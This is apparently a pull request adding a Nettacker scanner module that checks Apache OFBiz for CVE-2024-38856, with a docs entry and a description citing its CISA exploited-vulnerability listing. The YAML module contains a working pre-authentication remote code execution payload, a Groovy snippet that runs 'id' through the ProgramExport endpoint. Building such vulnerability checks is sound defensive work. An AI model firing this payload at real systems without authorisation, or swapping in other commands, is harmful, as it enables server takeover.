### PR TITLE
New module: Apache OFBiz CVE-2024-38856 vulnerability

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -123,6 +123,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 
 ## Vuln Modules
 
+* '**apache_ofbiz_cve_2024_38856**' - check the target for Apache OFBiz CVE-2024-38856
 * '**apache_struts_vuln**' - check Apache Struts for CVE-2017-5638
 * '**Bftpd_double_free_vuln**' - check bftpd for CVE-2007-2010
 * '**Bftpd_memory_leak_vuln**' - check bftpd for CVE-2017-16892

--- a/nettacker/modules/vuln/apache_ofbiz_cve_2024_38856.yaml
+++ b/nettacker/modules/vuln/apache_ofbiz_cve_2024_38856.yaml
@@ -1,0 +1,53 @@
+info:
+  name: apache_ofbiz_cve_2024_38856_vuln
+  author: OWASP Nettacker Team 
+  severity: 9.8
+  description: CVE-2024-38856 Apache OFBiz Unauthenticated endpoint could allow execution of screen rendering code
+  reference: 
+    - https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
+    - https://www.cisa.gov/news-events/alerts/2024/08/27/cisa-adds-one-known-exploited-vulnerability-catalog
+    - https://issues.apache.org/jira/browse/OFBIZ-13128
+   
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - critical_severity
+    - cve
+    - apache
+    - apache_ofbiz
+    - cisa_kev
+
+payloads:
+  - library: http
+    steps:
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:  
+                - "webtools/control/forgotPassword/ProgramExport?groovyProgram=throw+new+Exception('id'.execute().text)"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: java\.lang\.Exception\:\suid\=
+              reverse: false


### PR DESCRIPTION
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Apache OFBiz open-source enterprise resource planning (ERP) system CVE-2024-38856 to its Known Exploited Vulnerabilities ) catalog, citing evidence of active exploitation in the wild. 
CVE-2024-38856 carries a score of 9.8 out of 10 on the CVSS vulnerability-severity scale, since it allows pre-authentication remote code execution (RCE). CISA's move comes after proof-of-concept (PoC) exploits were made available to the public following the flaw's disclosure in early August 2024